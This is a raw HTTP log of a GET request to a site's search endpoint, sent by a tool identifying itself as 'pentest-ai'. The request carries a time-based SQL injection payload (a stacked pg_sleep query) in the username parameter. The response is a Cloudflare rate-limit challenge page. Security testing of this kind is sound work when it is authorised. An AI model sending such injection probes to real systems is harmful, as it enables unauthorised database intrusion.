REQUEST:
GET https://my.myfirst.tech/search?username=1%3B%20SELECT%20pg_sleep%285%29--
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:18 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9344
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c8475a9c20a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=UkK9VReVW4CoXO9AEVpaVJ%2BwBS1It67OqrmRoE8mdDxCGllS27CbkVXuiHCgiSiKVJPhMluZV6zpMpKk7lpBp2%2BiNLXqpjAIwe%2BxexDAv1tVKyM1Ft3cCLjngfbTCAbydQ%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c8475a9c20a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'ajrA.V2GHiM77MKX5xrjrh48kNHBZMpC.7M8_gW4d3c-1784281158-1.2.1.1-gH8zfrW_PTTpWKbDRNSFxt8LaCWKM5FHOmhiyCry7vB_qcvtZfeFPiTPvF7N5_96',cITimeS: '1784281158',cRay: 'a1c8475a9c20a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?username=1%3B+SELECT+pg_sleep%285%29--\u0026__cf_chl_tk=FQIy0pD25qAA53vfyIr.z0.Ay6vxsrBTFDaj9EngQUg-1784281158-1.0.1.1-g8dH7righS.8.BKbbkne65o75z3msHk.UXNEtEfp6eU",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?username=1%3B+SELECT+pg_sleep%285%29--\u0026__cf_chl_f_tk=FQIy0pD25qAA53vfyIr.z0.Ay6vxsrBTFDaj9EngQUg-1784281158-1.0.1.1-g8dH7righS.8.BKbbkne65o75z3msHk.UXNEtEfp6eU",md: 'xjqliMsNZUDeACHrltpdBFQZn_looYE8JvD13p.jNpI-1784281158-1.2.1.1-SN7nlJqCu.RYQUms4FEFK4df824R_3gCnefyewnaOnaiY7EfaG_YUMwIDnu9gTSWosmsarm0hwldnqMkfv5qjioJxJPg0yJTJwnu6Ley4PLelQ.n6f57E7X_.GFN82qBvZ.sQ.ZN1dTkrrwob23AQgY8xWQuQB_UtLOz18SrvNyPLFED2NZ31tTKmX5EZOH9965kZix_iXD12B4NNlra7H0.bniadZfP1_MT9lb76BzcRELkDAtMu.gK9Fe9IBJA5zQV_LLCDG9WvTVilZekp5l27hItFMpEsg2N0_o7RN3U2CpEaXrKivKEs9uNuT9I_cTFJ0JFTLwHZ2FfOpBwz73gpda5exM6V.LAVg4SkIG3ofmfQlGgCuMHoGhJT69CGZ_PJ5FlwiHWuT3JBlIkQmYu7zqOw2f1eNfAdltpsAzTfSjoskBXypGUMOmtjYp4p.fXS3LPNl67FXtZDjd7eHCTFwg4SLIfbDjpUbEaPfKlHAUPJOtl_AOlR0zfQyN..zvfmGcd5mWqeyDEAa5Dk5.uUSfEGepn6gjz8vprWr5gsOu5zXoZ0NEAjBXf0o6HDQJpe5V0kdBd.iW.AHYjuWhbVNYOYSCHZyvvmxO1UKAA.5tp8fPuO3z3REXXWXDIIIg.36445XhoozjtNi_UGYyUYKsuVsSOH8IRBHrBw5fNrycYkbCtjvc0rf.fw_OmcuE4VKunbzpvx9GkA0..Kw_IDRULIkxVea9FiXc6iWvKQZiWTRmoCq7K_GphU8y0_BYuxMzUXsOKzdhTIArb5wnwMaFiINh2Fb5K8XhlS0hAbSmnyK2lATGSWRevMWyE5YShKVlRwcp2hbd_9h6Ls4tFYzWE6FT9t6WLINxKCChTA.sSppjq0G.panxlyr4HgTPLRiAqganh_31.3Tf.A_5q_8lDNiMF3yzd5X.2Vu9D6MJ4b_pxHgCmCNf5caJ0HuUW0rSOzyIJ12VuiBDlpF6ZtzYsJX.tuJrOGAMmGLQ7BDx_iQMJQud5pugNoSJP_EuQzAsjVVqoHWwc8V.il6TkklFi0aNJw_MEQ4mOc0eBkT.ruPC2Z_AX3_aKuENNBNgHpdtm.sUXVjmnjS4LVOIMoLG2y60k2FmBBZtGcH14V3we8nMig1Keu.pXZ47rSJdT_.wQKlaByw8joqHCEbxuP9GAXMOTVvr.PBp335M',mdrd: 'AkHhdRSAywQftYz3PoK4D3J2MCbn9hxI1kSKSizIHRw-1784281158-1.2.1.1-.5Zy5Talqy7YDtDRs2UX3hXaRdBGYuMy1cK36p.vpLdzZNW86LkRAQ6i0a5q4KFkkLPAXoYOx6EdP6CRn2EaVNhqX8kGjhVb11gybkL.WNcYiE3r_EwmuxoSzuJjM.tknViMNQUjpatHM_Qn.Tu7QIRidNUnad9woXLKY7BzD.tx1vXJVj66JvdcSP6joYQFfFqKTvBkaVJksNq3UVAEC04Ymz9vnHFLvBRlsA5FMNNWYidkf1IxThMB_nB4TBDm',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c8475a9c20a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?username=1%3B+SELECT+pg_sleep%285%29--\u0026__cf_chl_rt_tk=FQIy0pD25qAA53vfyIr.z0.Ay6vxsrBTFDaj9EngQUg-1784281158-1.0.1.1-g8dH7righS.8.BKbbkne65o75z3msHk.UXNEtEfp6eU"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
